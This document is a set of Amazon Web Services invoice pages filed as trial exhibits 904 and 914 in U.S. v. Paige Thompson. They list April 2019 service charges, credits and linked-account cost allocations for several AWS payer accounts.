† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: [redacted]0227
ABA Routing Number: [redacted]0248
Wire Routing Number: [redacted]0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 904
Admitted____________________

| Amazon GuardDuty | $0.00 |
|---|---|
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Data Transfer | $26.24 |
| Charges | $26.24 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Glacier | $0.17 |
| Charges | $0.17 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Relational Database Service | $274.88 |
| Charges | $274.88 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Support (Business) | $1,488.77 |
| Charges | $1,488.77 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic Compute Cloud | $0.00 |
| Charges | $20,669.71 |
| Credits | ($20,669.71) |
| VAT ** | $0.00 |
| GST | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon DynamoDB | $112.29 |
| Charges | $112.29 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Route 53 | $12.85 |
| Charges | $12.85 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Config | $3.14 |
| Charges | $3.14 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.90 |
| Credits | ($0.90) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic File System | $2.80 |
| Charges | $2.80 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS CloudTrail** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Key Management Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Virtual Private Cloud** | **$108.10** |
| Charges | $108.10 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Kinesis** | **$75.60** |
| Charges | $75.60 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

## Please remit payment to Amazon Web Services:

Preferred method of payment is by Electronic Funds Transfer (EFT). Please ensure to reference the invoice number in the descriptive text field of your electronic funds transfer payment.

If you have any questions regarding payment for this invoice, please email aws-receivables-support@email.amazon.com

| Electronic funds transfer details: | or Mail payment to: |
|---|---|
| Bank Name: Wells Fargo NA<br>Account Name: Amazon Web Services, Inc.<br>Bank Address:<br>420 Montgomery Street<br>San Francisco CA 94163<br>Checking Account Number: 0227<br>ABA Routing Number: 0248<br>Wire Routing Number: 0248<br>SWIFT Code: WFBIUS6SXXX | Amazon Web Services, Inc.<br>PO BOX 84023<br>Seattle, WA 98124-8423, US |

All web services are sold by Amazon Web Services, Inc.

The above charges include charges incurred by your account as well as by all accounts you are responsible for through Consolidated Billing.

Thank you for using Amazon Web Services.

Sincerely,
**The Amazon Web Services Team**

This message was produced and distributed by Amazon Web Services, Inc., 410 Terry Avenue North, Seattle, Washington 98109-5210. AWS will not be bound by, and specifically objects to, any term, condition or other provision which is different from or in addition to the provisions of the AWS Customer Agreement or AWS Enterprise Agreement between AWS and you (whether or not it would materially alter such AWS Customer Agreement or AWS Enterprise Agreement) and which is submitted in any order, receipt, acceptance, confirmation, correspondence or otherwise, unless AWS specifically agrees to such provision in a written instrument signed by AWS.

Payer account number
[redacted]0924

# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
|---|---|
| Survox Operations [redacted]0924) | $1,772.55 |
| Charges | $18,471.13 |
| Credits | ($16,698.57) |
| Estimated US sales tax to be collected | $0.00 |
| Allen Porter [redacted]1047) | $292.87 |
| Charges | $4,181.66 |
| Credits | ($3,888.78) |
| Estimated US sales tax to be collected | $0.00 |
| Allen Porter [redacted]0039) | $54.27 |
| Charges | $137.53 |
| Credits | ($83.26) |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | $2,119.69 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
0924

| Summary for Linked Account | |
|---|---|
| Survox Operations 0924) | $1,772.55 |
| Charges | $18,471.13 |
| Credits | ($16,698.57) |
| Estimated US sales tax to be collected | $0.00 |
| Account 0924 total allocated for this invoice | $1,772.55 |

| Detail for Linked Account | |
|---|---|
| Amazon GuardDuty | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $13.18 |
| Charges | $13.18 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $3.77 |
| Charges | $3.77 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Glacier | $0.17 |
| Charges | $0.17 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $90.26 |
| Charges | $90.26 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Support (Business) | $1,488.77 |
| Charges | $1,488.77 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $0.00 |
| Charges | $16,698.23 |
| Credits | ($16,698.23) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
[redacted]0924

| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $46.02 |
| Charges | $46.02 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Config | $3.14 |
| Charges | $3.14 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $12.85 |
| Charges | $12.85 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.34 |
| Credits | ($0.34) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $2.80 |
| Charges | $2.80 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Virtual Private Cloud | $36.00 |
| Charges | $36.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Kinesis | $75.60 |
| Charges | $75.60 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
0924

| Summary for Linked Account | |
|---|---|
| Allen Porter 1047) | $292.87 |
| Charges | $4,181.66 |
| Credits | ($3,888.78) |
| Estimated US sales tax to be collected | $0.00 |
| Account 1047 total allocated for this invoice | $292.87 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $1.66 |
| Charges | $1.66 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $22.36 |
| Charges | $22.36 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.34 |
| Credits | ($0.34) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $130.48 |
| Charges | $130.48 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $66.27 |
| Charges | $66.27 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $0.00 |
| Charges | $3,888.44 |
| Credits | ($3,888.44) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Virtual Private Cloud | $72.10 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
0924

| | |
|---|---|
| Charges | $72.10 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
0924

| Summary for Linked Account | |
|---|---|
| Allen Porter 0039) | $54.27 |
| Charges | $137.53 |
| Credits | ($83.26) |
| Estimated US sales tax to be collected | $0.00 |
| Account 0039 total allocated for this invoice | $54.27 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.12 |
| Charges | $0.12 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.22 |
| Credits | ($0.22) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $54.14 |
| Charges | $54.14 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $0.00 |
| Charges | $83.04 |
| Credits | ($83.04) |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

# EXHIBIT 914



Account number:
8421

Bill to Address:
ATTN: Thomas Brenneke
590 Oak Meadow Dr
Lake Oswego , OR , 97034 , US

# Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | 7493 |
| Invoice Date: | May 3 , 2019 |
| **TOTAL AMOUNT DUE ON May 3 , 2019** | **$11,717.26** |

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | $11,717.26 |
| Charges | $13,298.81 |
| Credits | ($1,581.55) |
| Tax * | $0.00 |
| Total for this invoice | $11,717.26 |

| Detail for Consolidated Bill | |
|---|---|
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Storage Service | $92.84 |
| Charges | $92.84 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Relational Database Service | $1,510.49 |
| Charges | $1,510.49 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 914
Admitted_______________

| | |
|---|---|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Secrets Manager | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic Compute Cloud | $7,312.86 |
| Charges | $8,894.41 |
| Credits | ($1,581.55) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Backup | $2.19 |
| Charges | $2.19 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Config | $8.19 |
| Charges | $8.19 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Notification Service | $0.03 |
| Charges | $0.03 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Service Provider:**
**(Not to be used for payment remittance)**
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

| Amazon Redshift | $180.00 |
|---|---|
| Charges | $180.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic File System | $9.74 |
| Charges | $9.74 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AmazonCloudWatch | $942.57 |
| Charges | $942.57 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon ElastiCache | $497.78 |
| Charges | $497.78 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon CloudFront | $9.58 |
| Charges | $9.58 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Virtual Private Cloud | $71.90 |
| Charges | $71.90 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Service Provider:**
**(Not to be used for payment remittance)**
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

| | |
|---|---|
| CT | $0.00 |
| Amazon GuardDuty | $29.75 |
| Charges | $29.75 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Data Transfer | $230.43 |
| Charges | $230.43 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Email Service | $0.01 |
| Charges | $0.01 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Directory Service | $0.19 |
| Charges | $0.19 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon EC2 Container Service | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon DynamoDB | $20.59 |
| Charges | $20.59 |
| VAT ** | $0.00 |
| GST | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Service Provider:**
**(Not to be used for payment remittance)**
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon EC2 Container Registry (ECR) | $0.02 |
| Charges | $0.02 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Route 53 | $20.97 |
| Charges | $20.97 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $720.00 |
| Charges | $720.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS WAF | $7.13 |
| Charges | $7.13 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS CloudTrail | $0.82 |
| Charges | $0.82 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Key Management Service | $18.00 |
| Charges | $18.00 |
| VAT ** | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Service Provider:**
**(Not to be used for payment remittance)**
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

| | |
|---|---|
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Queue Service | $31.18 |
| Charges | $31.18 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Service Provider:**
**(Not to be used for payment remittance)**
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

Payer account number
8421

# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
|---|---|
| Public Alerts 4769) | $14.35 |
| Charges | $14.35 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Redux Operations 1517) | $63.68 |
| Charges | $63.68 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CryptoTrading Corp 9544) | $808.76 |
| Charges | $808.76 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Waitrainer 3625) | $761.53 |
| Charges | $2,343.07 |
| Credits | ($1,581.54) |
| Estimated US sales tax to be collected | $0.00 |
| Lebook 4337) | $265.00 |
| Charges | $265.00 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Volcanic Star 4212) | $747.98 |
| Charges | $747.98 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Network Redux 8421) | $27.31 |
| Charges | $27.31 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CryptoTrading Stage 9884) | $1,595.52 |
| Charges | $1,595.52 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
[redacted]8421

| | |
|---|---|
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Lunar Logic [redacted]5858) | $239.63 |
| Charges | $239.63 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| TradeIt Corp [redacted]9113) | $105.70 |
| Charges | $105.70 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| NikeSB [redacted]1775) | $166.03 |
| Charges | $166.03 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Adobe Spider Verse [redacted]7848) | $320.98 |
| Charges | $320.98 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Owen Jones [redacted]8246) | $83.75 |
| Charges | $83.75 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Redux Labs [redacted]7303) | $432.85 |
| Charges | $432.85 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Redux Bastion [redacted]4135) | $7.34 |
| Charges | $7.34 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CryptoTrading QA [redacted]7608) | $1,409.84 |
| Charges | $1,409.84 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
